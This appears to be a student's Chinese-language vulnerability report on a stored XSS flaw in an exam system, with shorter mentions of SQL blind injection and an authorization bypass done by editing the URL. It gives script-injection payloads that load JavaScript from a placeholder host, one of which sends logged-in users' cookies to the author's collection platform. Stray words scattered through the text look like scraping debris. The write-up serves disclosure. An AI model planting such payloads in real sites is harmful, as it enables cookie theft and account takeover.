最近学校因为方便咱们学生的平时测试,因此新开了个考试系统,闲着无聊我就抱着玩的心态去测试了一波,因为本篇是用来锻炼我将来写报告的能力,因此格式会稍有变化web
标题:中国职工电化教育中心处考试系统处存在存储型xss
漏洞类别:事件型漏洞
厂商信息:中国职工电化教育中心
漏洞类型:xss(存储型)
漏洞等级:中危
漏洞简述:该页面在未检验数据是否存在XSS代码的状况下,便将其存入数据库。并且当下一次从数据库中获取该数据时程序也未对其进行过滤,页面会再次执行插入的恶意XSS代码,存储型XSS能够持续攻击用户。当目标用户进入含有xss恶意代码的页面时,存放在服务器的xss代码会从服务器解析以后加载出来。受害者只要访问插入xss攻击的页面,恶意脚本就能成功可以盗取当前登陆用户的cookie,能形成用户敏感信息的泄露,能够配合csrf进行钓鱼攻击sql
一.往可能存在xss漏洞的输入框(25题笔记)构造如下代码进行验证:数据库
"> <script src="http://xxx.com/myjs/alert.js"></script>
成功出现弹窗,初步判断存在xss漏洞
服务器
相关验证:在考试结果页面测试xss弹窗时,若是不点击肯定在本页面弹出的xss窗口,那么与该页面关联的其它页面会出现卡死,致使与之关联的页面没法正常使用cookie
关闭该页面退出从新进去后,发现页面从新xss弹窗,这时候能够肯定,xss的类型为存储型xss
xss
二.利用自建xss平台插入js验证代码来获取用户敏感信息svg
“> <script src="http://xxx.com/myjs/cs.js"></script>
插入攻击语句时,f12能够清楚的看到页面加载了个人xss平台测试
语句插入成功后,到xss平台观看效果
不难看出xss平台准确的列出登陆用户的敏感信息,以及要请求访问的页面,由于是测试,因此个人xss代码没作过多的处理,若是有不法分子经过高明的手法构造xss语句来获取非法的用户敏感信息,后果将不堪设想!!!3d
关闭该页面退出从新进入
发现xss弹窗仍在
并且xss平台再次接收到了页面访问者的敏感信息
code
到此,漏洞复现完毕,能够肯定页面存在存储型xss
补充:修改信息处也存在xss存储型漏洞,并且考试页面存在sql时间盲注,(因为是内网服务器,顺手测试并无截到相关图片),但因为盲注太过麻烦,因此没有复现
除了xss漏洞外,
经过改URL地址栏能够查看不一样用户信息,证实对用户的身份不作效验,有可能存在水平越权漏洞!!